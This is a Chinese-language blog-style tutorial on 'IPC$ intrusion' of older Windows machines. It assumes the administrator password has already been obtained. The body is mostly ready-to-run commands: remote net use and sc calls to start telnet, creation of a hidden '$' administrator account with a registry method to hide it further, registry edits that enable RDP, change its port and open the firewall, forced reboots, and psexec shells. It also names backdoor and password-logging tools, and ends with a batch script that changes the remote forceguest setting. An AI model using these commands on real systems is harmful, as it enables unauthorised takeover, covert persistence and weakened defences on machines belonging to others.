IPC$入侵可谓经典中的经典，废话不多说，先列出经典命令，不注释了，都是很简单的命令，看不懂问度娘

当然假设管理员账户名密码已经得到了

net use \\ip\ipc$ "密码" /user:"用户名"　　——密码和用户名如果没有空格也可以不加引号，另外\ipc$也可以不写，如下所示：

net use \\ip 密码 /user:用户名

sc \\ip config tlntsvr start= auto　　——注意start=后面有个空格

sc \\ip start tlntsvr

telnet ip

input username passwd，thus get remote pc's shell

当然也可以用net time \\ip 配合at指令定时开启telnet或是别的服务

可以添加用户名密码并加为管理员

net user chy$ chy /add

net localgroup administrators chy$ /add　　——用户名最后加$是可以防止对方在cmd窗口下输入net user显示自己添加的用户名，当然在计算机管理下的用户还是可以显示出来的，更深层次的创建隐藏的具有管理员权限的用户需要直接对注册表操作，大致思路就是新建一个账号，然后复制管理员的注册表信息到新建账号，注册表导出，删除新建账号，再导入，这样不仅net user看不到，计算机管理也看不到，一定要在注册表中才会看到，具体操作不再细说~

关于3389终端常用命令，整理如下（摘自网上）：

【注：以下命令全部为CMD命令，可在 Telnet环境下执行】

1.查询终端端口 (适用于XP专业版、2000服务器版与2003操作系统)：

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

或以下命令：

regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"

type tsp.reg

2.开启XP&2003终端服务

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

3.更改终端端口为20008 (0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4.取消xp&2003系统防 火墙对终端服务3389端口的限制及IP连接的限制

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

5.开启Win2000的终端，端口为3389(需重启)

echo Windows Registry Editor Version 5.00 >2000.reg

echo. >>2000.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg

echo "Enabled"="0" >>2000.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg

echo "ShutdownWithoutLogon"="0" >>2000.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg

echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg

echo "TSEnabled"=dword:00000001 >>2000.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg

echo "Start"=dword:00000002 >>2000.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg

echo "Start"=dword:00000002 >>2000.reg

echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg

echo "Hotkey"="1" >>2000.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg

echo "PortNumber"=dword:00000D3D >>2000.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg

echo "PortNumber"=dword:00000D3D >>2000.reg

6.强行重启 Win2000&Win2003系统(执行完最后一条一句后自动重启)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf

(set inf=InstallHinfSection DefaultInstall)

echo signature=$chicago$ >> restart.inf

echo [defaultinstall] >> restart.inf

rundll32 setupapi,%inf% 1 %temp%\restart.inf

7.禁用TCP/IP端口筛选 (需重启)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8.终端超出最大连接数时可用下面的命 令来连接

mstsc /v:ip:3389 /console

9.调整NTFS分区权限

cacls c: /e /t /g everyone:F     (所有人对c盘都有一切权利)

cacls %systemroot%\system32\*.exe /d everyone     (拒绝所有人访问system32中exe文件)

用工具的操作简单介绍下，微软开发的一系列psxxx还是蛮好用的（摘自网上）

psexec.exe \\IP -u 管理员帐号 -p 密码 cmd　　\\ 用这个工具我们可以一步到位的获得 shell,之后做什么都可以了，安后门可以用 winshell，克隆就用 ca 吧，开终端用 3389.vbe ，记录密码用 win2kpass ，随便选了

当然也可以用OpenTelnet.exe开启telnet

OpenTelnet.exe \\server 管理员帐号 密码 NTLM 的认证方式(0) port　　\\ 用它可以方便的更改 telnet 的验证方式和端口，方便我们登陆

不可能每次入侵都是一帆风顺的，笔者试验了两次，分别在虚拟机和实验室局域网内做实验，系统都为XP，虚拟机一帆风顺，而物理机却存在问题：

net use Z: \\ip\c$ 拒绝访问，copy命令也拒绝访问 ，at亦然，貌似除了net time 和net use建立连接以外的命令都不能使用，辛辛苦苦得到了管理员帐号密码却发现被堵在门口了是不是觉得很坑爹呢，各种查资料，结果发现其实是归根到底一个问题，就是系统组策略中——计算机配置——Windows设置——安全设置——本地策略——安全选项——网络访问:本地账户的共享和安全模型被设置成了仅来宾模式，而不是经典模式。

如果将该设置设置为“经典”，则使用本地帐户凭据的网络登录会使用这些凭据进行身份验证。如果将该设置设置为“仅来宾”，则使用本地帐户的网络登录将自动映射到 Guest 帐户。“经典”模式允许对资源访问进行精确控制。使用“经典”模式，可以就同一资源为不同的用户授权不同类型的访问权限。使用“仅来宾”模式，可以公平地对待所有用户。所有用户都作为来宾得到身份验证，对于指定资源，这些用户可以获得相同级别的访问权限。

问题就出在这边，手动修改远程PC的这个选项后就可以完成前述的所有操作，当然通过注册表命令也行，命令如下：

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"forceguest"=dword:00000000

批处理命令如下：

echo Windows Registry Editor Version 5.00 >1.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>1.reg
echo "forceguest"=dword:00000000 >>1.reg
regedit /s 1.reg
del 1.reg

可是在仅来宾的模式下只有没有执行权限，找了好多资料，却始终不能解决由于这个仅来宾模式而导致的无法完全控制远程PC的问题，百思不得其解，求高手指导~~~